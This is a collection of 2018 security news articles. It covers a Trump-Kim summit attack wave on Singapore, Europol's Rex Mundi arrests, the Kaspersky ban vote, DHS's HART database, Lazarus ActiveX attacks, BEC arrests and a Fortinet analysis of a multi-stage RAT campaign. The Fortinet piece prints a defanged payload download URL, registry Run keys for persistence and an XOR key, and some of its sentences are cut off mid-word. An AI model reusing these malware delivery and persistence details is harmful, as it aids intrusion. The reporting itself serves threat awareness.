“From June 11 to June 12, 2018, F5 Labs, in concert with our data partner, Loryka, found that cyber-attacks targeting Singapore skyrocketed, 88% of which originated from Russia. What’s more, 97% of all attacks coming from Russia during this time period targeted Singapore.” reads the analysis published by F5 Labs. “We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel.”

The cyber attacks hit almost any computer system, from VoIP phones to IoT devices. The attacks began out of Brazil targeting port SIP 5060 of IP phones where communications are transmitted in clear text.

After an initial attack that lasted for a couple of hours, researchers observed a reconnaissance activity originated from the Russian IP address that is owned by ASN 49505, operated by Selectel; the scans targeted a variety of ports.

None of the attacks was carried out to spread malware.

“The number two attacked port was Telnet, consistent with IoT device attacks that could be leveraged to gain access to or listen in on targets of interest.” continues the analysis.

“Other ports attacked include the SQL database port 1433, web traffic ports 81 and 8080, port 7541, which was used by Mirai and Annie to target ISP-managed routers, and port 8291, which was targeted by Hajime to PDoS MikroTik routers.”

Singapore was hit by 40,000 attacks in just 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time.

The experts highlighted that only 8% were exploit attacks, while 92% were reconnaissance scans for potential targets.

34% of the attacks originated from Russia, the list of top attackers includes China, the US, France, and Italy.

Singapore attacks Trump-Kim Summit

Trump-Kim Summit

During the summit time frame, Singapore was the top destination of cyber-attacks, it received 4.5 times more attacks than countries like the U.S. and Canada.

The SIP port 5060 was targeted 25 times more than Telnet port 23, hackers were attempting to gain access to insecure communication systems or VoIP server and to compromise IoT devices to spy on communications.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 Labs concludes.

Trump-Kim Summit Attracts Wave of Cyber-Attacks on Singapore
16.6.2018 securityweek BigBrothers

The number of cyber-attacks targeting Singapore skyrocketed from June 11 to June 12, during the meeting between U.S. President Donald Trump and North Korean President Kim Jong-un in a Singapore hotel, and most of these attacks originated from Russia, F5 Labs reports.

Russia has long been said to keep the United States under a continuous barrage of cyber-attacks, and even attracted a series of sanctions following the hacking aimed at the 2016 presidential election, which was supposedly the doing of state-sponsored Russian threat actors.

Thus, it’s no wonder the Trump-Kim summit earlier this week was targeted as well, but the number of assaults coming from Russia is indeed impressive: 88% of the total number of observed cyber-attacks came from this country. Furthermore, 97% of all the attacks that originated from Russian during the timeframe targeted Singapore, data from F5 Labs and Loryka reveals.

“We cannot prove they were nation-state sponsored attacks, however the attacks coincide with the day President Donald Trump met with North Korean President Kim Jong-un in a Singapore hotel. The attacks targeted VoIP phones and IoT devices, which appears to be more than a mere coincidence,” F5 says.

The flurry of attacks, the security firm reveals, started out of Brazil by targeting port SIP 5060, the single most attacked port in the timeframe. IP phones use this port to send and receive communications in clear text.

This initial phase, which lasted for only a couple of hours, was followed by reconnaissance scans from the Russian IP address – an IP owned by ASN 49505, operated by Selectel – targeting a variety of ports.

The attacks observed on June 11 and June 12 also targeted the Telnet port, which is normally assaulted in Internet of Things (IoT) incidents. Other targeted ports include SQL database port 1433, web traffic ports 81 and 8080, port 7541 (used by Mirai and Annie to target ISP-managed routers), and port 8291 (previously targeted by Hajime).

During a period of 21 hours, starting at 11:00 p.m. on June 11 through 8:00 p.m. June 12, local time, a total of 40,000 attacks were launched on Singapore. Of these, 92% were reconnaissance scans looking for vulnerable devices, while the remaining 8% were exploit attacks.

“Thirty-four percent of the attacks originated from Russian IP addresses. China, US, France, and Italy round out the top 5 attackers in this period, all of which launched between 2.5 to 3 times fewer attacks than Russia. Brazil, in the sixth position, was the only other country we detected launching SIP attacks alongside Russia,” F5 reveals.

During the period, Singapore became the top destination of cyber-attacks by a large margin, receiving 4.5 times more attacks than the U.S. or Canada. Typically, Singapore is not a top attack destination, and the anomaly coincides with President Trump’s meeting with Kim Jong-un.

While Russia was the main source of attacks, accounting for 88% of them, Brazil was the second largest attacker, launching 8% of the assaults. Germany rounded up top three attackers, with 2%.

The security researchers also note that there was no attempt made to conceal the attacks launched from Russia and that none of the attacks originating from this country carried malware.

The SIP port 5060 received 25 times more attacks than Telnet port 23, which was the second most targeted. Although attacks on port 5060 are unusual, chances are that the attackers were attempting to gain access to insecure phones or perhaps the VoIP server. The attacks on Telnet were likely trying to compromise IoT devices to spy on communications and collect data.

“We do not have evidence directly tying this attacking activity to nation-state-sponsored attacks, however it is common knowledge that the Russian government has many contractors within Russia doing their bidding, and that a successful attack on a target of interest would make its way through to the Kremlin,” F5 concludes.

French Nationals Arrested for 'Rex Mundi' Hacks
16.6.2018 securityweek BigBrothers

Europol announced this week that several French nationals were arrested in the past year on suspicion of being involved with Rex Mundi, a group that hacked into the systems of several organizations and attempted to blackmail them.

According to Europol, the alleged members of the hacker group were identified after in May 2017 they targeted a UK-based company. The cybercriminals stole significant amounts of customer data from the firm and demanded the payment of a bitcoin ransom of nearly €580,000 ($670,000) for not making the stolen files public or more than €825,000 ($776,000) for information on how the attack was carried out. The hackers also told the victim that the amounts would increase by €210,000 ($240,000) for each day the payment was delayed.

After the victim reported the attack to law enforcement, the UK’s Metropolitan Police, the French National Police and Europol teamed up to identify the hackers. “Within an hour, Europol’s 24/7 Operational Centre was able to link the available information to a French national,” Europol said.

Five suspects were arrested in June 2017, two were arrested in October 2017 and one was apprehended on May 18, 2018. All of the suspects are French nationals and they were all arrested by French police, except for the last arrest, which took place in Thailand.

The individual who was arrested last month by the Royal Thai Police is a 25-year-old developer. The suspects arrested in October 2017 were described as “hackers.” The “main suspect,” as Europol describes him, admitted blackmailing companies, but claimed to have used the dark web to hire someone to conduct the hacking.

Rex Mundi was active since at least 2012 and until 2015 it made many of its operations public in hopes of convincing victims to pay up. Its victims included AmeriCash Advance, Webassur, Drake International, Buy Way, Hoststar, Websolutions.it, Numericable, Habeas, AlfaNet, Domino’s Pizza, and the Swiss bank Banque Cantonale de Geneve (BCGE). Many of the hacker group’s victims were Belgian companies.

European Parliament Votes to Ban Kaspersky Products
14.6.2018 securityweek BigBrothers  

Kaspersky Suspends Collaboration With Europol and NoMoreRansom

Kaspersky Lab has suspended its collaboration with Europol and the NoMoreRansom initiative after the European Parliament passed a resolution that describes the company’s software as being “malicious.”

Kaspersky is not trusted by some governments due to its alleged ties to Russian intelligence, which has sparked concerns that the company may be spying for Moscow.

The call for a ban on Kaspersky’s products in the European Union is part of a report on cyber defense written by Estonian MEP Urmas Paet of the Committee on Foreign Affairs.

The next-to-last proposal in the report “Calls on the EU to perform a comprehensive review of software, IT and communications equipment and infrastructure used in the institutions in order to exclude potentially dangerous programmes and devices, and to ban the ones that have been confirmed as malicious, such as Kaspersky Lab.”

The resolution was approved with 476 votes in favor and 151 against. In response, Kaspersky Lab’s founder and CEO, Eugene Kaspersky, said his company would be freezing collaboration with Europol and the NoMoreRansom project, and highlighted that the EU’s decision “welcomes cybercrime in Europe.”

Kaspersky is one of the private sector companies that founded NoMoreRansom, and it has helped Europol in several major cybercrime investigations, including a $1 billion cyber-heist.

“[It is] frustrating that there was no investigation, no evidence of any wrongdoing from our side, just references to false allegations from anonymous sources. This is the essence of media-ocracy: fake news → political decisions,” Eugene Kaspersky said on Twitter. “The risks of using our software are purely hypothetical. Just as hypothetical as with any other cybersecurity software of any country. But the risk of becoming a victim of a genuine cyberattack is real – and extremely high. Ergo: EP's political decision plays *for* cybercrime.”

Interestingly, an answer given in April by the European Commissioner for Digital Economy and Society, Mariya Gabriel, in response to a question from Polish politician Anna Fotyga regarding the risks associated with the use of Kaspersky software states that “the Commission has no indication for any danger associated with this anti-virus engine.”

On the other hand, Paet says he stands by his report. “These decisions must be taken seriously, they have not been taken out of the blue but instead have been drawn from various partners and intelligence sources. Considering the overall situation of EU-Russia relations, and Russia’s aggressive behaviour, we should not be taking risks that could cause serious damage to the EU,” he told EURACTIV after the vote.

The report is not legally binding, but it could influence some EU member states, especially since the U.K., the Netherlands and Lithuania have already moved to ban the use of Kaspersky software on sensitive systems. Kaspersky took legal action in the United States in an effort to overturn a decision to prohibit the use of its products by government agencies, but a judge rejected the lawsuit.

Many in the cybersecurity industry are skeptical of the accusations against Kaspersky, especially since no evidence of wrongdoing has been provided and many decisions related to the company appear to be based on media reports.

Reaction to EU vote to ban Kaspersky products

The security firm has been trying to clear its reputation, first by launching a transparency initiative that included giving partners access to source code, and more recently by announcing a move of core processes from Russia to Switzerland.

DHS HART Biometric Database Raises Security, Civil Liberties Concerns
13.6.2018 securityweek BigBrothers

Protecting the DHS HART National Biometric Database Against Theft and Abuse

In February 2018, Northrop Grumman Corporation announced that it had been awarded a $95 million contract to develop increments one and two of the Department of Homeland Security (DHS) Homeland Advanced Recognition Technology (HART) system.

The announcement said very little about HART, except that it is a "multi-modal processing and matching technology that uses a combination of face, finger and iris biometrics meeting DHS accuracy requirements." It is a database and system designed to incorporate, expand and replace the existing Automated Biometric Identity System (IDENT) built in the 1990s.

Last week the Electronic Frontier Foundation (EFF) provided more information on HART. In a Deeplinks blog, senior staff attorney Jennifer Lynch explained, "The agency's new Homeland Advanced Recognition Technology (HART) database will include multiple forms of biometrics -- from face recognition to DNA, data from questionable sources, and highly personal data on innocent people. It will be shared with federal agencies outside of DHS as well as state and local law enforcement and foreign governments."

HART will support, she expands, "at least seven types of biometric identifiers, including face and voice data, DNA, scars and tattoos, and a blanket category for 'other modalities'. It will also include biographic information, like name, date of birth, physical descriptors, country of origin, and government ID numbers. And it will include data we know to be highly subjective, including information collected from officer 'encounters' with the public and information about people's 'relationship patterns'."

EFF's primary concern over this vast new database of DNA, physical biometrics and social behavior is what it describes as the chilling effect on people exercising their First Amendment-protected rights to speak, assemble and associate. "Data like face recognition makes it possible to identify and track people in real time, including at lawful political protests and other gatherings," she writes.

Through EFF's understanding of the HART project and its concern over civil liberties, we now know more about the DHS biometric database. But there are other concerns beyond civil liberties. Security for this vast trove of the nation's most personal information is never mentioned. Indeed, Northrop Grumman's contract announcement merely states, "A keen focus on safeguarding personally identifiable information as well as ensuring the critical sharing of data across interagency partners underpins the technology."

But government does not have a good track record in securing the data it holds. In 2015, The Office of Personnel Management lost personal information on 21.5 million people to what is generally believed to be Chinese government-sponsored hackers.

In 2010, Chelsea Manning (born Bradley Manning) leaked 750,000 classified or sensitive military and diplomatic documents to WikiLeaks, including the infamous 'collateral murder' Baghdad airstrike video.

In 2013, Edward Snowden exfiltrated and leaked thousands of classified NSA documents exposing NSA and GCHQ clandestine global surveillance programs.

In 2016, the hacking group known as The Shadow Brokers leaked a series of exploits stolen from the Equation Group – believed to be the Tailored Access Operations (TAO) unit of the NSA. One of these exploits, EternalBlue, was used in both the WannaCry ransomware and NotPetya cyberattacks of 2017.

In March 2017, WikiLeaks began publishing a series of CIA classified documents and cybersecurity exploits under the name Vault 7.

These incidents demonstrate that government databases have historically been susceptible to both external hacks and insider breaches. However, the extent to which the HART database will become a magnetic target for hackers is conjecture, and not universally agreed.

Joseph Carson, chief security scientist at Thycotic, doesn't believe the database will be very attractive to hackers. "The only reason this would be attractive to cybercriminals," he told SecurityWeek, "would be to sell it onwards to nation states who would use such data for intelligence or economic advantages. However, the data alone would not be as valuable without the technology that analyzes the metadata for matches and relationships. So, cybercriminals and nation states would need to compromise both to make value of the stolen data."

Others take a different view. "This massive, aggregated database will represent an incomparable trove of intelligence about US citizens. You can be sure it will be a target," said Rick Moy, CMO at Acalvio.

Migo Kedem, director of product management at SentinelOne, adds, "There will be many criminals and states who would like to get their hands on this type of information, ranging from commercial and marketing, through business espionage to state level."

Protecting this database from external hackers, whether organized crime or nation states, is going to be a challenge. But it will be equally difficult to protect it from insiders. According to the EFF's figures, the IDENT fingerprint database already holds data on 220 million individuals, and processes 350,000 fingerprint transactions every day. The full HART database will go far beyond just fingerprints, and will be shared with federal agencies outside of DHS, with state and federal law enforcement, and even with foreign governments.

The ability to control everybody with access to the database will consequently be another challenge – health workers and policemen already covertly query their own databases to provide information for worried friends and relatives. The temptation to check on the relationship patterns of a daughter's new boyfriend – if possible – is just one danger. Looking at private industry, High-Tech Bridge CEO Ilia Kolochenko told SecurityWeek, "Data protection is certainly a high priority in large companies such as Google or Apple, but as we recently saw with Facebook – authorized third-parties are the uncontrollable Achilles' heel."

The subversion of authorized users through bribery, blackmail or stolen credentials is another difficulty. "When human interactions are involved, it is generally the easiest link to compromise," says SentinelOne's Kedem.

Just as securing access to the HART database will be difficult, so too will be securing the use of the database. While it can provide value to its users manually, there is little doubt that machine learning and artificial intelligence will be used to help locate the needles in this massive haystack. This is particularly concerning because of the intention to include 'relationship patterns', which will be easier sifted with AI than manual searches.

Indeed, it is tempting to wonder if HART will become the basis for the FBI's often-promised move into 'predictive policing'. Thycotic's Carson believes this is probable. "This goes way back," he said. "'Trapwire' was exposed by Wikileaks back in 2012 resulting from the Stratfor hacks. It reportedly used CCTV surveillance to recognize people from their facial biometrics, how they walked and even from the clothing they wear. The purpose of such technology was prioritized for national security and it has been known that such technology had existed; but this was a clear indication that it was formerly in use. However, it is now clear that such data is being used beyond national security in both government and commercial use for profit and control."

Acalvio's Rick Moy simply said, "Predictive models need tons of data, so it would certainly be an enabler."

But this brings us to the next problem: false positives potentially generated by built-in bias in the artificial intelligence algorithms. Carson is not too concerned: "I would assume the results would have to be verified by a human. The AI and machine learning is typically to find the needle in a haystack and a human is used to validate the results."

Moy, however, does have concerns. "False positives come with any algorithm based on diverse data inputs. Bias is a human trait, and humans are still writing the algorithms. But it's worth noting that there's quite a difference between searching for known features of a past incident versus asking a system what the most relevant features of an incident were, versus predicting who will commit a future crime."

The implication is that use of the HART database to identify suspects is likely to be very accurate; but its use to predict criminal, terrorist or simply anti-social behavior would be worrying. If there is a bias against certain ethnic groups for, say, criminal or terrorist activity within society and existing records, that bias can potentially be transferred to the AI algorithms resulting in damaging and far-reaching false positives.

"US Congress needs to look at the old adage of 'we could, but should we?' while going forward with the DHS HART database," comments Abhishek Iyer, Technical Marketing Manager at Demisto. "AI and ML algorithms often mirror and amplify the biases of the data collected. If DHS investigation will be based on biometric recognition whose accuracy is already compromised by bias, it can lead to wrongful arrests, distress for US travelers, and lost government resources."

There is little doubt that a national biometric database could help law enforcement. But at what cost? The Electronic Frontier Foundation fears is will damage freedom of speech and association, and massively impinge upon personal privacy. But the challenges posed by HART go beyond civil liberties. Securing both access to and use of the data is going to be very difficult.

North Korean Hackers Abuse ActiveX in Recent Attacks
12.6.2018 securityweek  BigBrothers

An ActiveX zero-day vulnerability discovered recently on the website of a South Korean think tank focused on national security has been abused by the North Korean-linked Lazarus group in attacks, AlienVault reports.

ActiveX controls are usually disabled on most systems, but the South Korean government demands they are enabled on machines in the country. This has led to numerous attacks abusing ActiveX to compromise systems in South Korea, with many of the attacks attributed to North Korean hackers.

The same applies to the newly observed attacks, where JavaScript code was used to deploy various ActiveX vulnerabilities, including a zero-day. Soon after the attacks occurred, local media attributed them to the Andariel gang, which is said to be part of Lazarus, the state-sponsored hacking group considered the most serious threat against banks.

Also referred to as BlueNoroff, the group has orchestrated high profile attacks such as the devastating attack against Sony Pictures in late 2014 and the $81 million cyber heist from Bangladesh's account at the New York Federal Reserve Bank in 2016. This year, the actor supposedly switched targets to cryptocurrency, but also hit an online casino in Central America.

According to a new AlienVault report, the Lazarus hackers were behind the recently revealed ActiveX attacks as well.

The group used a profiling script as the initial reconnaissance tool, in an attempt to gather information on possible targets. Although this is a tactic the Lazarus group has employed before, other threat actors use it as well.

The next step of the attack involved scripts capable of gathering additional information from the system and designed to deliver the ActiveX exploit.

In a tweet several weeks ago, Cyber Warfare Intelligence Center and IssueMakersLab founder Simon Choi shared some details on the scripts used in the assault, revealing that an initial reconnaissance stage was deployed in January 2017, while script injections only occurred in late April 2018.

The script was designed to identify the browser and operating system running on the victim’s machine and borrows much of the code from PinLady’s Plugin-Detect. When detecting Internet Explorer on a machine, the script checks if ActiveX is enabled, as well as plugins running (from a specific list of ActiveX components).

AlienVault also notes that one of the other scripts involved in the attack, apparently used for profiling, sends data to a website that might have been compromised a while back, as it was previously recorded as a command and control (C&C) server for Lazarus malware in 2015.

The ActiveX exploit used in the recent assault, also shared by Simon Choi on Twitter, was meant to download malware from peaceind[.]co.kr and save it to the system as splwow32.exe.

“Splwow32.exe is a fairly uncommon filename for malware, and was previously seen in the Taiwan bank heist which has been attributed to another sub-set of the Lazarus attackers. We also note that the peaceind[.]co.kr site has been previously identified as vulnerable,” AlienVault says.

The malware appears to be called Akdoor, a simple backdoor designed to execute commands using Command Prompt. The malware also uses a “distinctive command and control protocol,” the security researchers say.

U.S. Blacklists Russian Firms Tied to FSB Hacking Ops
12.6.2018 securityweek BigBrothers

The United States placed five Russian companies and three individuals on its sanctions blacklist Monday for allegedly supporting the FSB intelligence agency's hacking operations, including a firm involved in subsea operations.

The US Treasury named Digital Security and two subsidiaries as helping develop offensive cyber capabilities for Russian intelligence services, including the already-sanctioned FSB.

The Kvant Scientific Research Institute was also included on the blacklist, as a state enterprise supervised by the FSB.

In addition, Divetechnoservices and three officials of the firm were sanctioned for supplying and supporting the government's underwater capabilities in monitoring and hacking subsea communications cables around the world.

US officials have become alarmed over the past year at the extent of US-targeted offensive cyber operations that Washington alleges have official backing from Moscow.

Those include the global NotPetya cyber attack, which paralyzed thousands of computers around the world last year; intrusions into the control systems of the US energy grid; and the insertion of trojans into home and company networking devices around the world, which allow both the diversion of data and attacks that could shut down networks.

The sanctions freeze property and assets under US jurisdiction and seek to lock those named out of global financial networks.

Vietnam MPs Approve Sweeping Cyber Security Law
12.6.2018 securityweek BigBrothers

Vietnamese lawmakers on Tuesday approved a sweeping cyber security law which could compel Facebook and Google to take down critical posts within 24 hours, as space for debate is crushed inside the Communist country.

Activists and dissenters are routinely harassed, jailed or tied up in legal cases in Vietnam, a one-party state which is hyper-sensitive to critical public opinion.

Social media and Internet forums have provided a rare platform to share and debate views against authorities.

But the bill, waved through by an overwhelming majority of MPs in the National Assembly, is poised to end that relative freedom.

The law's far-reaching provisions mean internet companies will have to remove posts deemed to be a "national security" threat within a day and store personal information and data of their users inside Vietnam.

"Currently, Google and Facebook store personal data of Vietnamese users in Hong Kong and Singapore," Vo Trong Viet, chairman of National Assembly's defence and security committee told lawmakers.

"Putting data centres in Vietnam will increase expenses for the service providers... but it is necessary to meet the requirements of the country's cyber security."

The new law outlaws material encouraging public gatherings or that "offends" everything from the national flag to the country's leaders and "heroes".

There was no immediate detail of the punishment for violating the new rules.

Only 15 out of the 466 MPs present in the rubber-stamp assembly voted against the bill, which the government says will become law from January 1, 2019.

Rights advocates said it further shrinks the small space for debate.

"In the country's deeply repressive climate, the online space was a relative refuge where people could go to share ideas and opinions with less fear of censure by the authorities," said Clare Algar of Amnesty International.

"With the sweeping powers it grants the government to monitor online activity, this vote means there is now no safe place left."

The Asia Internet Coalition, an advocacy group for behalf of Facebook, Google, Twitter and other tech firms in the region, said it was "disappointed" by the assembly's vote.

"Unfortunately, these provisions, will result in severe limitations on Vietnam's digital economy, dampening the foreign investment climate and hurting opportunities for local businesses and SMEs to flourish inside and beyond Vietnam," said Jeff Paine, managing director of the internet coalition.

The country's conservative leadership, which has been in charge since 2016, is waging a crackdown on activists and dissidents.

At least 26 dissidents and actives have been prosecuted during the first five months this year, according to Human Rights Watch.

The government has also unveiled a 10,000-strong brigade to fight cybercrimes and "wrongful views" on the internet, according to state media reports.

The unit, dubbed Force 47, is also tasked with fighting anti-state propaganda on the web.

Operation WireWire – Law enforcement arrested 74 individuals involved in BEC scams
12.6.2018 securityaffairs BigBrothers

US authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting BEC scams.
On Monday, the U.S. authorities announced the arrest of 74 individuals as part of an international law enforcement operation dubbed ‘operation WireWire’ targeting business email compromise (BEC) scams.

The authorities conducted the investigation for over six months, 42 suspects have been arrested in the United States, 29 in Nigeria, the remaining in Canada, Mauritius, and Poland.

Law enforcement seized roughly $2.4 million and was able to recover of roughly $14 million in fraudulent wire transfers.

“Operation WireWire—which also included the Department of Homeland Security, the Department of the Treasury, and the U.S. Postal Inspection Service—involved a six-month sweep that culminated in over two weeks of intensified law enforcement activity resulting in 74 arrests in the U.S. and overseas, including 42 in the U.S., 29 in Nigeria, and three in Canada, Mauritius, and Poland.” reads the press note released by the Department of Justice and the FBI.

“The operation also resulted in the seizure of nearly $2.4 million and the disruption and recovery of approximately $14 million in fraudulent wire transfers.”

bec operation wirewire

During Operation WireWire, law enforcement executed more than 51 domestic actions, including search warrants, asset seizure warrants, and money mule warning letters

The suspects have been involved in schemes targeting businesses of all sizes and individual victims.

According to the DoJ, 23 individuals were charged in the Southern District of Florida with laundering at least $10 million obtained from BEC scams. in one case the suspects tricked a real estate closing attorney into wiring $246,000 to their account.

According to a report published by TrendMicro, Business Email Compromise (BEC) attacks had surpassed the value of damage to enterprises in the past years and it is estimated that it could reach $ 9 billion dollars in 2018. This rising value of loss for business takes into account new attack vectors like the one from Lebanese Intelligence Agency Dark Caracal malware who utilizes malware in android application.

BEC frauds have devastating impacts not only on the individual business but also on the global economy.

“Since the Internet Crime Complaint Center (IC3) began formally keeping track of BEC and its variant, e-mail account compromise (EAC), there has been a loss of over $3.7 billion reported to the IC3.” continues the note.

The report states that the FBI released a public announcement revealing that BEC attacks had become a $ 5.3 billion industry in the past years. In that regard, the report emphasizes that hackers are employing Social Engineering to lure and deceive employees in a myriad of scams to bypass security measures. By using a deep understanding of Human Psychology hackers are circumventing the defenses, as the report states ” it requires little in the way of special tools or technical knowledge to pull off, instead of requiring an understanding of human psychology and knowledge of how specific organizations work.”

The report lists how BEC attacks are usually conducted. The techniques are: Bogus invoice scheme, CEO fraud, Account compromise, Attorney impersonation and Data Theft. The report highlight that these attacks can be classified into two major groups: Credential grabbing and email only.

The analysis of losses caused by crimes reported in the FBI 2017 Internet Crime Report, a document that outlines cybercrime trends over the past year, BEC/EAC ($676,151,185) is prominent, followed by Confidence Fraud/Romance ($211,382,989), and Non-Payment/Non-Delivery ($141,110,441).

“BEC is a sophisticated scam targeting businesses that often work with foreign suppliers and/or businesses and regularly perform wire transfer payments. The Email Account Compromise (EAC) variation of BEC targets individuals who regularly perform wire transfer payments.” states the report.

“It should be noted while most BEC and EAC victims reported using wire transfers as their regular method of transferring business funds, some victims reported using checks.”

Today’s announcement highlighting this recent surge in law enforcement resources targeting BEC schemes “demonstrates the FBI’s commitment to disrupt and dismantle criminal enterprises that target American citizens and their businesses,” according to FBI Director Christopher Wray.

And he added, “We will continue to work together with our law enforcement partners around the world to end these fraud schemes and protect the hard-earned assets of our citizens. The public we serve deserves nothing less.”

Crooks used multi-stage attacks aimed at Russian Service Centers
12.6.2018 securityaffairs BigBrothers

Fortinet recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.
Security researchers from Fortinet have recently spotted a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

Experts highlighted the hackers conducted multi-stage attacks but excluded the involvement of a nation-state actor.

Attackers leveraged spear-phishing messages using weaponized Office documents exploiting the 17-Year-Old MS Office flaw CVE-2017-11882 that was addressed by Microsoft updates in October.

The first attacks were observed at the end of March when crooks sent spear-phishing emails to a service company that repairs Samsung’s electronic devices.

The messages were written in Russian and contained a file named “Symptom_and_repair_code_list.xlsx”.

Russian service centers

“FortiGuard Labs discovered a series of attacks targeted at service centers in Russia. These service centers provide maintenance and support for a variety of electronic goods.” reads the post published by Fortinet.

“A distinctive feature of these attacks is their multi-staging. These attacks use forged emails, malicious Office documents with exploits for a vulnerability that is 17 years old, and a commercial version of a RAT that is tucked into five different layers of protective packers.”

Experts noticed that the content of the email was the result of a translation made by a translator service, analyzing the headers of the email the experts discovered that the IP address of the sender wasn’t associated with to the domain in the “From” field.

The attackers used a different XLSX file for each email, they used shellcode to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload.

“The two most important functions “imported” by the shellcode are: URLDownloadToFileW and ExpandEnvironmentStringsW.” continues the analysis.

“The purpose of the first one is obvious. The last function is used to determine the exact location where the shellcode should store downloaded payload, since this location will be different under different platforms. Finally, Shellcode downloads a file from the URL: hxxp://brrange.com/imm.exe, stores it in %APPDATA%server.exe, and then tries to execute it.”

The final payload uses multiple-layer multi-packer protection to avoid detection.

The first stage implements the first layer of protection, the popular ConfuserEx packer that obfuscates objects names, as well as names of methods and resources,

The resources are used to determine the next stage payload, which is encrypted using DES, and executes the decrypted file named BootstrapCS that represents the second stage of the multi-layer protection.

BootstrapCS is not obfuscated, but it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This check is essential to avoid the code being execute in a virtualized environment and also searches for and shuts dowIt also writes the payload path to the following startup registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\[Specified Name]
The stage 3 of the payload is represented by a binary resource named mainfile that represents the third level of packing protection, a simple XOR algorithm with the KEY = 0x20 was used for encryption.

Once the payload is decrypted payload it is injected into a process based on the value in the settings resource file.

The stage 3 of the payload resolves a commercial Remote Administration Tool (RAT) dubbed Imminent Monitor. At stage 4, the security researchers once again used the ConfuserEx packer.

The Imminent Monitor RAT includes the following five modules:

that allows the malicious code to control the victim’s machine, including the webcam.

The analysis of the C&C servers revealed 50 domains registered by the attackers on the same day, some of them were used by crooks to deliver malware, while others were involved in phishing attacks. The experts also discovered older .XLSX samples that exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” concludes Fortinet.

Further details are included in the IoCs section of the report.

Multi-Stage Attacks Target Service Centers in Russia

11.6.2018 securityweek   BigBrothers

Fortinet security researchers recently observed a series of cyber-attacks targeting Russian service centers offering maintenance and support for various electronic goods.

The attacks stand out because of their multi-staging and are believed to have been launched by a non-Russian actor. The attackers used spear-phishing emails and malicious Office documents exploiting CVE-2017-11882, a 17 years old vulnerability in Office’s Equation Editor that Microsoft manually patched in October last year.

The targeted attack started at the end of March with spear-phishing emails received at a service company that repairs Samsung’s electronic devices. Pretending to come from representatives of Samsung, the emails specifically targeted this organization, were written in Russian, and contained a file named Symptom_and_repair_code_list.xlsx, related to the targeted company’s profile.

The emails were likely the result of machine translation, instead of being created by a native Russian speaker, the security researchers reveal. Furthermore, the headers of the email revealed that the IP address of the sender wasn’t related to the domain in the “From” field.

The attackers used different attachments for each email, but all messages had seemingly legitimate .XLSX files attached. Furthermore, all of the documents contained an exploit for the CVE-2017-11882 vulnerability.

The shellcode used in the attacks was meant to perform various tasks to gain access to the LoadLibraryA and GetProcAddress functions that allow it to execute the final payload. It also imports other functions, including one used to determine the exact location where the downloaded payload should be stored.

The payload features multiple-layer multi-packer protection, starting with an initial layer where the well-known ConfuserEx packer was used to obfuscate objects names, along with the names of methods and resources. From these resources, it reads the next stage payload, which is encrypted using DES, and executes the decrypted file.

The decrypted file, named BootstrapCS, is the second stage of the multi-layer protection. While not obfuscated, it contains multiple anti-analysis checks, with the structure “settings” in the resources section determining which checks should be performed.

This stage can check for various emulation, sandbox, and virtual machine tools, and also searches for and shuts down specified processes, in addition to disabling system utilities. It also writes the payload path to startup registry keys, hides the file with system and hidden attributes, and injects the payload in various processes.

A binary resource named mainfile is the encrypted stage 3 of the payload. It is an executable that represents the third level of packing protection: a simple XOR algorithm with the KEY = 0x20 was used for encryption. The decrypted payload is injected into a process based on the value in the settings resource file.

The stage 3 of the payload references to a commercial Remote Administration Tool (RAT) called Imminent Monitor, which can be purchased by anyone, directly from the app developer (who apparently prohibits the malicious use of the program). At stage 4, the security researchers once again stumbled upon ConfuserEx.

The main payload of the attack, however, turned out to be the commercial version of the Imminent Monitor RAT, which includes five modules to record videos using the victim’s webcam, to spy on victims, and to control their machines.

The command and control (C&C) servers used in these attacks led the researchers to discover 50 domains registered on the same day, some of which were used to spread malware, while others for phishing attacks. The researchers also discovered older .XLSX samples that use the same C&C but attempt to exploit different vulnerabilities.

“We also noticed that the pattern of these attacks has become quite popular today. The use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years. It is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case,” Fortinet concludes.

Former GCHQ chief Hannigan warns of Russia’s aggressive approach to the cyberspace

11.6.2018 securityaffairs  BigBrothers

According to former GCHQ chief, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.
Former GCHQ chief Robert Hannigan has warned that the availability of hacking tools in the main marketplaces is rapidly changing the threat landscape. Hannigan served as the director of the UK intelligence agency between November 2014 until January 2017.

Threat actors have an easy access to attack tools even without having specific knowledge.

Hannigan spoke had a keynote speech titled “Weaponising the web: Nation-state hacking and what it means for enterprise cybersecurity” at the Infosec conference in London last week.

Hannigan highlighted the risks associated with the operation conducted by nation-state actors that had dramatically increased over the last five years.

State-sponsored hackers pose a serious risk for enterprises as well as governments, the former GCHQ chief warned of Government APT group using crime gangs as a proxy machine hard the attribution.

“Nation state attacks using criminal group as a proxy” is a “fairly new issue.” Hacking tools are becoming a commodity for threat actors and represent problem companies.

Hannigan mentioned the activity conducted by North Korea-linked APT and Iranian state-sponsored hackers.

North Korean APT groups, like the infamous Lazarus APT crew, focused its activity on SWIFT network as well as crypto exchanges to steal funds.

“This is a rational state pursuing rational objectives,” explained Hannigan.

Hannigan warned of the intensification of the Iranian hackers that also targeted financial institutions.

Which is the greatest threat?

Russia, of course! Russia-linked APT groups are very sophistication and continuously target infrastructure worldwide. in some cases they demonstrated destructive abilities, like the attacks against the Ukrainian power grid.


According to Hannigan, the recently discovered VPNFilter botnet is the demonstration that Russia appears to be live-testing cyberattacks.

